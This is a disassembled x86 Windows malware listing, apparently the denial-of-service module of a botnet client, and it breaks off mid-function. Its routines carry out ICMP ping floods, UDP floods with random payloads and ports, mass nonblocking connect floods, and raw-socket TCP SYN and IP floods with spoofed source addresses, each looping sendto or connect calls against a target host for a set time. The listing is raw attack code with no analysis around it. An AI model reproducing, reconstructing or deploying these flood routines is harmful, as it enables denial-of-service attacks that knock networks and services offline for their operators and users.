xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413D60
lea eax, [ebp+var_C0]
push eax
call dword_4E317C ; gethostbyname
cmp eax, ebx
jz short loc_413D66
loc_413D60: ; CODE XREF: sub_413D05+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413DC3
loc_413D66: ; CODE XREF: sub_413D05+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_44CD4C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413DA6
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409D34
add esp, 14h
loc_413DA6: ; CODE XREF: sub_413D05+7F�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_30]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413DC3: ; CODE XREF: sub_413D05+5F�j
cmp eax, ebx
jz short loc_413DD3
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413DD6
; ---------------------------------------------------------------------------
loc_413DD3: ; CODE XREF: sub_413D05+C0�j
mov [ebp+var_4], esi
loc_413DD6: ; CODE XREF: sub_413D05+CC�j
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413DF6
mov [ebp+var_3C], eax
loc_413DF6: ; CODE XREF: sub_413D05+EC�j
cmp [ebp+var_38], edi
jge short loc_413DFE
mov [ebp+var_38], edi
loc_413DFE: ; CODE XREF: sub_413D05+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_413E2B
loc_413E05: ; CODE XREF: sub_413D05+124�j
push [ebp+var_38]
lea eax, [ebp+Dst]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4E3010 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413E05
loc_413E2B: ; CODE XREF: sub_413D05+FE�j
push [ebp+arg_0]
call dword_4E31B0 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_44CD74 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413E74
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409D34
add esp, 14h
loc_413E74: ; CODE XREF: sub_413D05+14D�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_30]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_413D05 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E91 proc near ; DATA XREF: sub_401CC7+57DC�o
var_10311 = byte ptr -10311h
var_10310 = byte ptr -10310h
Dest = byte ptr -334h
var_134 = dword ptr -134h
Str = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
push 11h
push 2
push 2
call dword_4E3178 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+Dst], 2
push eax
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_413F76
lea eax, [ebp+var_B0]
push eax
call dword_4E317C ; gethostbyname
cmp eax, edi
jnz short loc_413F6F
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_44CDA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_413F52
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409D34
add esp, 14h
loc_413F52: ; CODE XREF: sub_413E91+9F�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_20]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_413F6F: ; CODE XREF: sub_413E91+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_413F79
; ---------------------------------------------------------------------------
loc_413F76: ; CODE XREF: sub_413E91+6E�j
lea eax, [ebp+arg_0]
loc_413F79: ; CODE XREF: sub_413E91+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_413F94
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_413F97
; ---------------------------------------------------------------------------
loc_413F94: ; CODE XREF: sub_413E91+F0�j
push [ebp+var_24]
loc_413F97: ; CODE XREF: sub_413E91+101�j
call dword_4E30F8 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_413FA9
mov [ebp+var_24], esi
loc_413FA9: ; CODE XREF: sub_413E91+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_413FB6
mov [ebp+var_24], eax
loc_413FB6: ; CODE XREF: sub_413E91+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_413FCA
mov [ebp+var_28], esi
loc_413FCA: ; CODE XREF: sub_413E91+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_413FEB
loc_413FD1: ; CODE XREF: sub_413E91+158�j
call _rand
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi+var_10311], dl
jl short loc_413FD1
loc_413FEB: ; CODE XREF: sub_413E91+13E�j
; sub_413E91+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_41404A
push 0Bh
pop esi
loc_413FF8: ; CODE XREF: sub_413E91+197�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_4E315C ; sendto
push [ebp+var_28]
call ds:dword_4F534C ; Sleep
dec esi
jnz short loc_413FF8
cmp [ebp+var_24], edi
jnz short loc_413FEB
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4E30F8 ; htons
mov [ebp+var_E], ax
jmp short loc_413FEB
; ---------------------------------------------------------------------------
loc_41404A: ; CODE XREF: sub_413E91+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_44CDC8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_41408A
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409D34
add esp, 14h
loc_41408A: ; CODE XREF: sub_413E91+1D7�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_20]
call sub_40BA72
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_413E91 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140A7 proc near ; DATA XREF: sub_401CC7+4E6D�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_414208
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44CDF4 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414127
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D34
add esp, 14h
loc_414127: ; CODE XREF: sub_4140A7+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_4140A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414146 proc near ; CODE XREF: sub_414208+27�p
var_654 = byte ptr -654h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E30F8 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_414204
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_414191: ; CODE XREF: sub_414146+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_414199: ; CODE XREF: sub_414146+7A�j
push 0
push 1
push 2
call ds:dword_4F553C ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_4141BC
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_4F5514 ; ioctlsocket
loc_4141BC: ; CODE XREF: sub_414146+64�j
add esi, 4
dec ebx
jnz short loc_414199
lea esi, [ebp+var_654]
mov ebx, edi
loc_4141CA: ; CODE XREF: sub_414146+96�j
lea eax, [ebp+Dst]
push 10h
push eax
push dword ptr [esi]
call ds:dword_4F5530 ; connect
add esi, 4
dec ebx
jnz short loc_4141CA
push 64h
call ds:dword_4F534C ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_4141EE: ; CODE XREF: sub_414146+B4�j
push dword ptr [esi]
call ds:dword_4F5538 ; closesocket
add esi, 4
dec ebx
jnz short loc_4141EE
dec [ebp+arg_4]
jnz short loc_414191
pop edi
pop esi
pop ebx
loc_414204: ; CODE XREF: sub_414146+3E�j
xor eax, eax
leave
retn
sub_414146 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_414208(int,char *Str,int)
sub_414208 proc near ; CODE XREF: sub_4140A7+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE55
push [esp+10h+Str] ; Str
mov edi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov esi, eax
push esi
push ebx
push edi
call sub_414146
add esp, 18h
test eax, eax
jnz short loc_41423E
push 1
pop eax
loc_41423E: ; CODE XREF: sub_414208+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_414208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41424D proc near ; DATA XREF: sub_401CC7+64CA�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_41459E
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44CE20 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4142CD
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D34
add esp, 14h
loc_4142CD: ; CODE XREF: sub_41424D+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_41424D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142EC proc near ; CODE XREF: sub_41459E+3C�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
Dst = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4E3068 ; WSAStartup
test eax, eax
jz short loc_41432C
xor eax, eax
jmp loc_41459A
; ---------------------------------------------------------------------------
loc_41432C: ; CODE XREF: sub_4142EC+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4E319C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_414592
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_414588
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_8]
call dword_4E30F8 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_4E30F8 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_4E30F8 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_4E30F8 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_4F540C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call __allmul
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_414417: ; CODE XREF: sub_4142EC+25D�j
; sub_4142EC+26B�j
mov [ebp+var_24], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4E30F8 ; htons
mov [ebp+var_34], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4E30F8 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4E30F4 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4E30F8 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AFCA
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_34]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_8C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AFCA
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_4E315C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_41455C
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_414585
jl loc_414417
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_414585
jmp loc_414417
; ---------------------------------------------------------------------------
loc_41455C: ; CODE XREF: sub_4142EC+247�j
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CE48 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 10h
jmp short loc_414588
; ---------------------------------------------------------------------------
loc_414585: ; CODE XREF: sub_4142EC+25B�j
; sub_4142EC+269�j
mov ebx, [ebp+arg_8]
loc_414588: ; CODE XREF: sub_4142EC+78�j
; sub_4142EC+297�j
push [ebp+var_C]
call dword_4E3190 ; closesocket
pop esi
loc_414592: ; CODE XREF: sub_4142EC+5B�j
call dword_4E3050 ; WSACleanup
mov eax, ebx
loc_41459A: ; CODE XREF: sub_4142EC+3B�j
pop edi
pop ebx
leave
retn
sub_4142EC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41459E(int,char *Str,int)
sub_41459E proc near ; CODE XREF: sub_41424D+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE55
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4142EC
add esp, 1Ch
test eax, eax
jnz short loc_4145E9
push 1
pop eax
loc_4145E9: ; CODE XREF: sub_41459E+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_41459E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4145F8 proc near ; DATA XREF: sub_401CC7+6EC5�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4E3138 ; inet_addr
push eax
call sub_41469B
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_44CE68 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_41467C
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409D34
add esp, 14h
loc_41467C: ; CODE XREF: sub_4145F8+62�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_4145F8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41469B proc near ; CODE XREF: sub_4145F8+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Src = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
push 1
pop ecx
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
mov ebx, 0FFh
push 6
xor eax, eax
pop edx
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
mov edi, 100h
push edi ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call dword_4E310C ; gethostname
push [ebp+var_4]
call dword_4E317C ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call dword_4E3178 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call dword_4E30D8 ; setsockopt
mov esi, 200h
push esi ; Size
call _malloc
mov edi, ds:dword_4F537C
pop ecx
mov [ebp+Memory], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4E30F8 ; htons
mov [ebp+var_96], ax
loc_4147B6: ; CODE XREF: sub_41469B+1FC�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja loc_41489C
call _rand
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call _rand
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call _rand
cdq
mov ecx, 1FA4h
mov [ebp+Src], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call _rand
mov [ebp+var_20], ax
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call dword_4E30F8 ; htons
push esi
mov [ebp+var_1E], ax
call dword_4E30F8 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call _rand
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+Src]
push eax
call sub_40AFCA
mov [ebp+var_1A], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
push [ebp+Memory] ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+Memory]
push [ebp+var_4]
call dword_4E315C ; sendto
jmp loc_4147B6
; ---------------------------------------------------------------------------
loc_41489C: ; CODE XREF: sub_41469B+12C�j
push [ebp+Memory] ; Memory
call _free
pop ecx
push [ebp+var_4]
call dword_4E3190 ; closesocket
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_41469B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148B6 proc near ; DATA XREF: sub_401CC7+5469�o
Dest = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
Str = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_4F537C
call edi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
push 0FFh
push 3
push 2
call dword_4E3178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_41497F
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
